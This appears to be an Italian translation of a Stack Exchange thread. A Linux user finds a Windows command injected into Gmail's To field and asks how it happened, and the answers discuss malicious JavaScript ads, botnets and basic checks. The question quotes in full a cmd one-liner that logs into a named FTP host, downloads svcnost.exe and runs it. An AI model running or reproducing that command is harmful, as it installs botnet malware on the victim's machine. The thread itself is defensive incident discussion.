Come identificare se il mio computer Linux è stato violato?

Il mio PC di casa è di solito acceso, ma il monitor è spento. Questa sera sono tornato a casa dal lavoro e ho trovato quello che sembra un tentativo di hacking: nel mio browser, Gmail era aperto (ero io), ma era in modalità di composizione con quanto segue nel TOcampo:

md / c echo open cCTeamFtp.yi.org 21 >> ik & echo user ccteam10 765824 >> ik & echo binary >> ik & echo get svcnost.exe >> ik & echo bye >> ik & ftp -n -v -s: ik & del ik & svcnost.exe & exit echo Sei diventato proprietario

Questo mi sembra il codice della riga di comando di Windows e l' mdinizio del codice combinato con il fatto che Gmail era in modalità di composizione, rende evidente che qualcuno ha provato a eseguire un cmdcomando. Suppongo di essere stato fortunato a non eseguire Windows su questo PC, ma ne ho altri che lo fanno. Questa è la prima volta in assoluto che mi è successo qualcosa del genere. Non sono un guru di Linux e al momento non eseguivo altri programmi oltre a Firefox.

Sono assolutamente sicuro di non averlo scritto e nessun altro era fisicamente al mio computer. Inoltre, ho recentemente cambiato la mia password di Google (e tutte le mie altre password) in qualcosa del genere, vMA8ogd7bvquindi non credo che qualcuno abbia violato il mio account Google.

Cosa è appena successo? In che modo qualcuno inserisce i tasti sul mio computer quando non è la vecchia macchina Windows di nonna che esegue malware da anni, ma una recente installazione di Ubuntu?

Aggiornamento:
lasciami rispondere ad alcuni dei punti e delle domande:

• Sono in Austria, in campagna. Il mio router WLAN esegue WPA2 / PSK e una password medio-forte che non è presente nel dizionario; dovrebbe essere forza bruta e meno di 50 metri da qui; non è probabile che sia stato violato.
• Sto usando una tastiera cablata USB, quindi è molto improbabile che qualcuno possa trovarsi a portata di mano per hackerarla.
• Non stavo usando il mio computer in quel momento; era solo al minimo a casa mentre ero al lavoro. È un PC nettop montato su monitor, quindi raramente lo spengo.
• La macchina ha solo due mesi, esegue solo Ubuntu e non sto usando software strano o non sto visitando siti strani. È principalmente Stack Exchange, Gmail e giornali. Niente giochi. Ubuntu è impostato per tenersi aggiornato.
• Non sono a conoscenza di alcun servizio VNC in esecuzione; Certamente non ne ho installato o abilitato uno. Inoltre non ho avviato altri server. Non sono sicuro se qualcuno sia in esecuzione su Ubuntu per impostazione predefinita?
• Conosco tutti gli indirizzi IP nell'attività dell'account Gmail. Sono abbastanza sicuro che Google non fosse un ingresso.
• Ho trovato un Visualizzatore file di registro , ma non so cosa cercare. Aiuto?

Quello che voglio davvero sapere è, e ciò che mi fa sentire davvero insicuro, è: come può chiunque da Internet generare i tasti sulla mia macchina? Come posso evitarlo senza essere tutto un cappello di carta stagnola? Non sono un fanatico di Linux, sono un padre che ha pasticciato con Windows per oltre 20 anni e ne sono stanco. E in tutti i 18 anni di attività online, non ho mai visto personalmente alcun tentativo di hacking, quindi questo è nuovo per me.

Dubito che tu abbia qualcosa di cui preoccuparti. È stato più che probabile un attacco JavaScript che ha provato a fare un disco scaricando . Se sei preoccupato che ciò accada, inizia a utilizzare i componenti aggiuntivi di NoScript e AdBlock Plus per Firefox.

Anche visitando siti affidabili non sei sicuro perché eseguono codice JavaScript da inserzionisti di terze parti che possono essere dannosi.

L'ho afferrato ed eseguito in una macchina virtuale. Ha installato mirc e questo è il registro di stato ... http://pastebin.com/Mn85akMk

È un attacco automatizzato che sta cercando di farti scaricare mIRC e unirti a una botnet che ti trasformerà in uno spambot ... Ha avuto la mia VM unirsi e stabilire una connessione a un numero di diversi indirizzi remoti uno dei quali è autoemail-119.west320.com.

Eseguendolo in Windows 7 ho dovuto accettare il prompt UAC e consentirne l'accesso attraverso il firewall.

Sembra che ci siano tonnellate di segnalazioni di questo esatto comando su altri forum e qualcuno dice persino che un file torrent ha provato a eseguirlo al termine del download ... Non sono sicuro di come sarebbe possibile.

Non l'ho usato da solo, ma dovrebbe essere in grado di mostrarti le connessioni di rete correnti in modo da poter vedere se sei connesso a qualcosa fuori dalla norma: http://netactview.sourceforge.net/download.html

Sono d'accordo con @ jb48394 che probabilmente è un exploit JavaScript, come tutto il resto in questi giorni.

Il fatto che abbia tentato di aprire una cmdfinestra (vedere il commento di @ torbengb ) ed eseguire un comando dannoso, piuttosto che scaricare il trojan in modo discreto in background, suggerisce che sfrutta una vulnerabilità in Firefox che gli consente di inserire i tasti, ma non eseguire il codice.

Questo spiega anche perché questo exploit, che è stato chiaramente scritto esclusivamente per Windows, dovrebbe funzionare anche su Linux: Firefox esegue JavaScript allo stesso modo in tutti i sistemi operativi (almeno, tenta di :)) . Se fosse stato causato da un buffer-overflow o da un exploit simile pensato per Windows, avrebbe semplicemente bloccato il programma.

Per quanto riguarda la provenienza del codice JavaScript, probabilmente un annuncio Google dannoso (gli annunci si alternano in Gmail per tutto il giorno) . E non sarebbe essere la prima volta .

Ho trovato un attacco simile su un'altra macchina Linux. Sembra che sia una specie di comando FTP per Windows.

Ciò non risponde all'intera domanda, ma nel file di registro cercare tentativi di accesso non riusciti.

Se ci sono più di circa cinque tentativi falliti nel tuo registro, qualcuno ha provato a decifrare root. Se si è tentato correttamente di accedere rootmentre si era lontani dal computer, CAMBIARE IMMEDIATAMENTE LA PASSWORD !! Intendo proprio ora! Preferibilmente a qualcosa alfanumerico e lungo circa 10 caratteri.

Con i messaggi che hai (i echocomandi) sembra davvero un kiddie di script immaturi . Se fosse stato un vero hacker a sapere cosa stava facendo, probabilmente non lo sapresti ancora.

whois segnala che west320.com è di proprietà di Microsoft.

UPnP e Vino (Sistema -> Preferenze -> Desktop remoto) combinati con una password Ubuntu debole?

Hai usato repository non standard?

DEF CON organizza una competizione Wi-Fi ogni anno su quanto lontano è possibile raggiungere un punto di accesso Wi-Fi - l'ultimo che ho sentito dire era 250 miglia.

Se vuoi davvero avere paura, guarda le schermate di un centro command-n-control di una botnet Zeus . Nessuna macchina è sicura, ma Firefox su Linux è più sicuro delle altre. Ancora meglio, se si esegue SELinux .